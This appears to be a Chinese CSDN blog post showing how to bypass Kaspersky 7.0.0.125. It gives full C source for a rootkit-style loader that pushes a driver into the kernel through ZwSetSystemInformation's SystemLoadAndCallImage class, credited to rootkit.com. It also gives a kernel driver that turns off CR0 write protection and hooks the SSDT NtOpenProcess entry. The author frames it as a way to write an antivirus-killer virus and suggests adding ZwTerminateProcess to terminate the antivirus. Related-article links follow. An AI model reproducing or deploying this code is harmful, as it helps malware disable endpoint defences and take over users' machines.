卡巴のZwSetSystemInformation的心寒

最新推荐文章于 2021-05-27 14:59:17 发布
最新推荐文章于 2021-05-27 14:59:17 发布
阅读量464 收藏
点赞数
分类专栏: 驱动开发学习 文章标签: descriptor image system string struct attributes

ZwSetSystemInformation的使用,卡巴7.0.0.125的失誤.

前提:好几個月前有人公布了點卡吧的失誤,當時我沒留意,前天復習好無聊,試驗了一下結果嚇了一跳.好似現在中國都是用7.0.0.125這個版本的,危險,雖然7.0.1.133已經封了這個函數了不過是英文版,沒多少人去用吧?好了,下麵直接寫源碼并解析,相信對病毒有興趣的朋友會懂吧,又可以寫一個AV終結者類的病毒了.(源碼來自www.rootkit.com)

實驗對象:卡巴7.0.0.125
實驗函數:ZwSetSystemInformation
實驗內容:繞過卡吧裝驅動(多麽恐怖的事),結果將會使系統失去防禦

 

// TestKisOfZwSetSystemInformation.cpp : Defines the entry point for the console application.

//

 

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

 

// New Deployment Module for rootkit 040

// -------------------------------------

// -Greg Hoglund http://www.rootkit.com/

/*

有关ZwSetSystemInformation的用法可以参考Gary Nebbett的《Windows NT/2000 Native API //Reference》

ZwSetSystemInformation设置影响操作系统的信息,定义如下:

NTSYSAPI

NTSTATUS

NTAPI

ZwSetSystemInformation(

     IN SYSTEM_IMFORMATION_CALSS SystemInformationClass,

     IN OUT PVOID SystemInformation,

     IN ULONG SystemInformationLength);

 

参数:

     SystemInformationClass:将被设置的系统信息的类型,值为SYSTEM_IMFORMATION_CALSS枚举的一个子集,SystemLoadAndCallImage就是

 

SystemInformation:

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE{

     UNICODE_STRING ModuleName;

} SYSTEM_LOAD_AND_CALL_IMAGE,*PSYSTEM_LOAD_AND_CALL_IMAGE;

 

     SystemInformationLength:長度sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)

 

成员:

     Module:要加载模块的NATIVE NT格式的完整路径

 

备注:

     这个信息类只能被设置,不是设置任何信息,而是执行把一个模块加载到内核地址空间和调用其入口点的操作。期望入口点例程是一个带两个参数的__stdcall例程(与设备驱动程序的DriverEntry例程一致)。如果入口点例程返回一个失败代码,则卸载模块。

 

SystemInformation:指向含有被设置信息的一个调用者分配的缓冲区或变量

SystemInformationLength:以字节为单位的SystemInformaiton的大小,根据给定的

SystemInformationClass来设置它

*/

 

//*-----一些數據類型的定義開始--------------

typedef unsigned long NTSTATUS;

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

 

typedef struct _UNICODE_STRING

{

     USHORT Length;

     USHORT MaximumLength;

     PWSTR Buffer;

} UNICODE_STRING, *PUNICODE_STRING;

 

typedef VOID (__stdcall *RTLINITUNICODESTRING)(

     IN OUT PUNICODE_STRING DestinationString,

     IN PCWSTR SourceString

);

 

typedef NTSTATUS (__stdcall *ZWSETSYSTEMINFORMATION)(

     IN DWORD SystemInformationClass,

     IN OUT PVOID SystemInformation,

     IN ULONG SystemInformationLength

);

 

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE

{

     UNICODE_STRING ModuleName;

} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

 

#define SystemLoadAndCallImage 38

//*-----數據類型的定義結束--------------

 

void main(void)

{

     SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;

     RTLINITUNICODESTRING RtlInitUnicodeString;

     ZWSETSYSTEMINFORMATION ZwSetSystemInformation;

 

     if( !(RtlInitUnicodeString =

         (RTLINITUNICODESTRING) GetProcAddress(GetModuleHandle("ntdll.dll"),

         "RtlInitUnicodeString")) )//在ntdll.dll中获取RtlInitUnicodeString地址

         exit(1);

 

     if( !(ZwSetSystemInformation =

         (ZWSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandle("ntdll.dll"),

         "ZwSetSystemInformation")) )//在ntdll.dll中获取ZwSetSystemInformation地址

         exit(1);

 

     RtlInitUnicodeString( &(GregsImage.ModuleName),

         L"//??//C://NtOpenProc.sys" );//加載的驅動就是這個了

 

     if( NT_SUCCESS(ZwSetSystemInformation( SystemLoadAndCallImage,

         &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ))//加载进内核空间

         printf("Rootkit Loaded./n");

     else printf("Rootkit not loaded./n");

}

驅動源碼是來自CSDN上的一篇文章的,內容是還原SSDT并可以繞過Inline Hook(還原對象是NtOpenProcess),忘了文章的名稱,作者抱歉.

 

#include<ntddk.h>

 

typedef struct _SERVICE_DESCRIPTOR_TABLE

{

     PVOID  ServiceTableBase;

     PULONG  ServiceCounterTableBase;

     ULONG  NumberOfService;

     ULONG  ParamTableBase;

} SERVICE_DESCRIPTOR_TABLE,*PSERVICE_DESCRIPTOR_TABLE; //由于KeServiceDescriptorTable只有一项,这里就简单点了

extern PSERVICE_DESCRIPTOR_TABLE    KeServiceDescriptorTable;//KeServiceDescriptorTable为导出函数

 

//---------------------------------------------------------------------

__declspec(naked) NTSTATUS __stdcall MyNtOpenProcess(

     PHANDLE ProcessHandle,

     ACCESS_MASK DesiredAccess,

     POBJECT_ATTRIBUTES ObjectAttributes,

     PCLIENT_ID ClientId)

{

     DbgPrint("NtOpenProcess() called");

     __asm

     {

         push    0C4h

         push    804eb560h  //共十个字节

         jmp    [JmpAddress]  

     }

}

//---------------------------------------------------------------------

VOID Hook()

{

     ULONG  Address;

     Address = (ULONG)KeServiceDescriptorTable->ServiceTableBase + 0x7A * 4;//0x7A为NtOpenProcess服务ID

     DbgPrint("Address:0x%08X",Address);

 

     OldServiceAddress = *(ULONG*)Address;//保存原来NtOpenProcess的地址

     DbgPrint("OldServiceAddress:0x%08X",OldServiceAddress);

 

     DbgPrint("MyNtOpenProcess:0x%08X",MyNtOpenProcess);

 

     JmpAddress = (ULONG)NtOpenProcess + 10; //跳转到NtOpenProcess函数头+的地方,这样在其前面写的JMP都失效了

     DbgPrint("JmpAddress:0x%08X",JmpAddress);

 

     __asm

     {//去掉内存保护

         cli

         mov  eax,cr0

         and  eax,not 10000h

         mov  cr0,eax

     }

 

     *((ULONG*)Address) = (ULONG)MyNtOpenProcess;//HOOK SSDT

 

     __asm

     {//恢复内存保护

         mov  eax,cr0

         or  eax,10000h

         mov  cr0,eax

         sti

     }

}

 

VOID Unhook()

{

     ULONG  Address;

     Address = (ULONG)KeServiceDescriptorTable->ServiceTableBase + 0x7A * 4;//查找SSDT

 

     __asm

     {

         cli

         mov  eax,cr0

         and  eax,not 10000h

         mov  cr0,eax

     }

 

     *((ULONG*)Address) = (ULONG)OldServiceAddress;//还原SSDT

 

     __asm

     { 

         mov  eax,cr0

         or  eax,10000h

         mov  cr0,eax

         sti

     }

}

//---------------------------------------------------------------------

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)

{

     Unhook();

}

 

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,PUNICODE_STRING RegistryPath)

{

     DriverObject->DriverUnload = OnUnload;

     Hook();

     return STATUS_SUCCESS;

}

好了,可以測試結果了,加載驅動是成功的,卡巴沒反應,此時用普通的軟件(例如:Syscheck2)都可以看到卡巴加載的模塊了,我就寫還原NtOpenProcess而已,但如果加多幾個函數,例如ZwTerminateProcess,那個恐怖,任務管理器就可以輕鬆結束掉卡吧(不過卡巴7,沒那麽容易結束的,哈哈).

總之能繞過卡巴裝了驅動 , 恐怖 ! 黑客幾乎沒什麽不能做了 .
cosmoslife
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
动态加载驱动程序源代码
06-14
源代码包含三种不同的驱动加载方法,使用ZwSetSystemInformation函数加载驱动,使用NtLoadDriver函数加载驱动,使用服务控制管理器加载驱动,还包括三种线程注入技术,使用RtlCreateUserThread 函数注入线程,使用CreateRemoteThread函数注入线程,使用NtCreateThreadEx函数注入线程,源代码包含C,C#的demo
zwSetSystemInformation加载驱动
小驹的专栏
05-19 4477
zwSetSystemInformation函数是个未公开的函数,调用38号会加载驱动,对应的第二个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体,第三个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体的长度.. #include #include #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >
通过ZwSetSystemInformation在驱动中加载驱动
pureman_mega的博客
07-04 817
环境:win7 32 ,材料: ntoskrnl.exe , spldr.sys spsys.sys 看到一个文件叫spldr.sys,loader for security processor,一个加载器。于是就进去看看如何实现的。在spldr.sys 里面看到字符串 SystemRoot\system32\drivers\spsys.sys ,应该就是要加载这个驱动了。再看字符串的引用位置,发现调用ZwSetSystemInformation,应该就是通过这个函数来加载驱动的。下面是调用情况: .
一个加载驱动的API - ZwSetSystemInformation
sxr__nc的博客
11-15 515
ZwSetSystemInformation( IN SYSTEM_IMFORMATION_CALSS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength); 第一个参数:SystemInformationClass:将被设置的系统信息的类型,值为SYSTEM_IMFORM...
ZwSetSystemInformation的使用
04-02 2035
實驗對象:卡巴7.0.0.125實驗函數:ZwSetSystemInformation實驗內容:繞過卡吧裝驅動(多麽恐怖的事),結果將會使系統失去防禦 // TestKisOfZwSetSystemInformation.cpp : Defines the entry point for the console application.// #include #
驱动加载器
04-12
包含完整的源代码,资源文件,和工作区。
Windows驱动源程序
12-15
Windows 驱动开发 WDM DDK Windows驱动源程序,驱动程序,网上不多
LoadSysFile
08-24
本程序用来将sys文件加载到内核中并运行, 使用SCM(服务控制管理器)加载有更好的稳定性, 然而, 使用ZwSetSystemInformation加载, 能获得更好的隐蔽性. 作者:施自成 Blog: http://hi.csdn.net/justin_shi Email: ...
ZwSetSystemInformation释疑
Rookie Rock
11-13 1526
ZwSetSystemInformation比较特殊,用了那段经典的加载方法,会发现老是加载不成功,到底成不成呢?我用VMWARE+WinDbg测试了,lm,发现服务列表里面是有了的,但是dbgview没有输出。在这里(http://hi.baidu.com/hypkb/blog/item/fe58b7830b377498f603a6f4.html)找到这样一段话: 起初是在那本书上面看到的,可惜怎么试都是失败,本身很简单就调调API的问题,再后来看到这篇:用SystemLoadAndCallImage加载
NtQuerySystemInformation的不同参数的结构
做一个快乐学习者
05-27 995
__kernel_entry NTSTATUS NtQuerySystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); typed...
由句柄所调用的 NtClose 已使用 NtSetInformationObject 以防止关闭 问题解决
ahch8077的博客
12-26 406
今天使用VS2008调试dll程序,调用dll的exe抛出异常 由句柄所调用的 NtClose 已使用 NtSetInformationObject 以防止关闭 发现原因是小红伞Avira更新导致的。 官方的解决方案为: http://www.avira.com/de/support-for-free-faq-detail/faqid/805 不过是德语的 官方称这个b...
Windows NT引导过程源代码分析(三)
hnzwx888的专栏
06-20 1001
1.3建立用户登录会话 Windows内核在阶段1初始化的最后,启动了一个用户模式进程——会话管理器子系统(smss)。Smss进程是Windows操作系统的关键组成部分,它尽管是一个用户模式进程,但有其特殊性:首先,它是可信的,这意味着它可以做一些其他用户进程无法做的事情,比如创建安全令牌;其次,它直接建立在Windows内核的基础上,只使用Windows内核提供的系统服务,...
SystemCrashDumpStateInformation加载驱动
04-14 773
使用如下代码可将系统中的atapi.sys (如果你的机器磁盘PORT驱动是atapi.sys的话,如果是scsiport的话会有不同)加载到系统中。模块名为dump_atapi.sys(如果已配置了生成dump则无法生效)HMODULE hlib = LoadLibrary("ntdll.dll");PVOID p = GetProcAddress(hlib , "NtSetSystemIn
 Windows子系统(GUI)
maomao171314的专栏
12-15 4971
Windows子系统 1 Windows子系统结构 Windows子系统结构,如图: Windows子系统有用户模式和内核模式组件。列出这些组件的职责: a. 内核模块win32k.sys。是Windows内核的扩展。包含两大功能组成部分: 窗口管理器(window manager): 负责控制窗口显示、管理屏幕输出、手机来自键盘鼠标和其他设备的输入,以及将用户信息传递给应用程序。 GDI:图形输出设备的函数库。 b.图形设备驱动程序。 c.Windows环境子系统进程(csrss.e..
分析了一下360安全卫士的 HOOK(二)——架构与实现(zt)
lionzl的专栏
07-11 3350
上一篇的分析中漏掉了三个函数,现补上: NtSetSystemInformation    0×24 ProcessNotify        0×45 //这个并非Hook,只是HookPort安装的一个Notify KeUserModeCallback      0×4B 这样一共是从0到0×4B,共0×4C个过滤函数,齐了~~ 上次先列出了360所hook的系统服务,让大家对它做了
ZwSetSystemInformation函数的SystemLoadAndCallImage调用驱动
weixin_33989780的博客
06-29 462
//////////////////////////////////////// // New Deployment Module for rootkit 040 // ------------------------------------- // -Greg Hoglund http://www.rootkit.com /////////////////////////////...
Greg Hoglund大牛的ZwSetSystemInformation()加载驱动
blackbean的专栏
09-16 742
这里备份一下: #include #include typedef struct _UNICODE_STRING {     USHORT Length;     USHORT MaximumLength; #ifdef MIDL_PASS

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值